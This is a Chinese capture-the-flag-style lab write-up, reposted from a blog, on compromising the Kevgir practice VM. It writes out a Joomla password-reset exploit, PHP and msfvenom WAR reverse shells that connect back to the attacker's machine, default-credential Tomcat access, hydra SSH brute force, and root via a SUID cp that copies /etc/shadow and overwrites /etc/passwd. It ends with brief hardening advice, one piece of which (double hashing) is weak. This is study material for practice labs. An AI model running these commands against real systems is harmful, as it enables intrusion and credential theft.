Kevg靶机渗透实现 8080端口 8081端口 1322端口实现
一、信息搜集
先使用ifconfig查看本机ip:
用nmap工具扫描本机ip段下的主机:
发现目标靶机ip为192.168.152.134
查看目标靶机开放了哪些端口:
发现80,8080,8081,9000端口上开放了HTTP服务,1322端口开放了SSH服务,可以作为漏洞突破点
二、外网突破
- 对于8081端口进行突破
通过搜索可以发现,有一个对于此系统的漏洞扫描工具joomscan,扫描此网页:
有很多此系统的漏洞,这里我选择CVE-2008-3681,是远程修改密码,通过点击链接进入,发现已经给出实例:
我们用这种方法尝试对于8081端口进行修改
先输入192.168.152.134:8081/index.php?option=com_user&view=reset&layout=confirm,输入令牌为“’”,修改password,我设置为admin
通过admin账户和刚修改的密码登入系统
我们通过template manager中的beez来上传反弹shell的php代码,通过查看本机的文件发现自带的有php-reverse-shell.php
修改其中的ip为主机ip,端口设置为1234
上传成功后我们用nc工具监听我们的1234端口,同时访问该文件的网页
用python3 -c 'import pty;pty.spawn("/bin/bash")'
来转化为交互式shell,至此获得了shell
- 8080端口渗透
查看网页,tomcat7
使用nikto扫描网页 nikto -h http://192.168.211.134:8080
发现tomcat的弱口令ID:tomcat PW:tomcat,找到管理页并登入
登陆之后
发现可以上传war包, 这里我们可以通过上传一个反弹 shell的war,然后再监听端口,从而拿到shell的控制权
用kali生成一个war并上传
Msfvenom -p java/jsp_shell_reverse_tcp LHOST = 192.168.211.131 LPORT = 1111 war > a_jsp_shell_1111.war
访问http://192.168.211.134:8080/a_jsp_shell_1111/
监听1111端口得到shell
- 1322端口
首先通过nmap扫描靶机信息:
发现1322端口运行的是ssh协议,又发现其版本为OPENSSH 6.6.lpl通过msfconsole查询openssh的漏洞:
我们使用第3个漏洞,是用于枚举服务器存在的用户的
设置目标主机和端口,同时设置要爆破用用户名字典,使用的为kali自带的/usr/share/wordlists/metasploit/piata_ssh_userpass.txt,设置成功查看options
成功后开始run执行,记录搜索出来的用户名
用hydra进行弱口令爆破admin的密码为admin
通过ssh远程登录靶机的shell
成功获取shell
三、权限提升
通过find / -perm -u=s -type f 2>/dev/null查找系统中赋予了s权限的程序
我们通过cat etc/passwd查看发现,有root,admin,user三个用户可以是使用
由于我们权限无法直接访问etc/shadow,所以我们使用之前发现的有s权限的cp命令将其复制到tmp目录下查看
发现三个用户名的密码,是密文。将admin信息复制到kali桌面文件夹保存
用john工具进行密码爆破,由于之前爆破过,报告中我们直接show其结果
得到admin账户的密码为admin
我们在自己的kali中添加admin用户,并将其用户id和组id设置为0
在主机中搭建一个简单的http服务器,端口号默认设置为8000
由于靶机中/tmp文件不需要高权限,所以我们把kali主机中的passwd下载到靶机中的tmp中
由于cp具有root权限,所以我们用cp把下载的passwd覆盖靶机中原/etc/passwd,此时admin的权限为root
我们su admin切换用户,使用id和whoami确认奕获得root权限,至此提权成功
四、 系统防护
- 在获得admin的密码的时候,使用到了哈希值爆破密码,我们可以使用对于密码明文加密后的哈希值再次进行加密得到一个“哈希值的哈希值”,这样可以有效的防止如john等hash值爆破工具轻松的破解出明文密码。
- 文件上传漏洞是攻击者通过上传⽊马⽂件,直接得到,危害等级超级⾼,现在的⼊侵中上传漏洞也是常见的漏洞。导致该漏洞的原因在于代码作者没有对访客提交的数据进⾏检验或者过滤不严,可以直接提交修改过的数据绕过扩展名的检验。建议对⽂件格式限制,只允许某些格式上传。
- 权限提升。权限提升是指利⽤系统中的或是别的⽅法使得⾃⼰突破了原来的限制,能够⾮法访问对⽅⽬录甚⾄是使得⾃⼰能够向那样来获取整个权限。 建议:1.定期进⾏固件、中间件的升级。不要给用户设置⼯作之外的权限。对⽂件格式限制,只允许某些格式上传。
- 弱口令爆破漏洞。应用存在默认口令或口令较简单易被猜到。会被一些弱口令爆破工具得到口令。建议一是设置更为复杂的口令,使得爆破口令变得困难,二是一段时间要更换新的口令,防止攻击者利用爆破的口令多次入侵系统。
来源地址:https://blog.csdn.net/m0_56705273/article/details/128163192
免责声明:
① 本站未注明“稿件来源”的信息均来自网络整理。其文字、图片和音视频稿件的所属权归原作者所有。本站收集整理出于非商业性的教育和科研之目的,并不意味着本站赞同其观点或证实其内容的真实性。仅作为临时的测试数据,供内部测试之用。本站并未授权任何人以任何方式主动获取本站任何信息。
② 本站未注明“稿件来源”的临时测试数据将在测试完成后最终做删除处理。有问题或投稿请发送至: 邮箱/279061341@qq.com QQ/279061341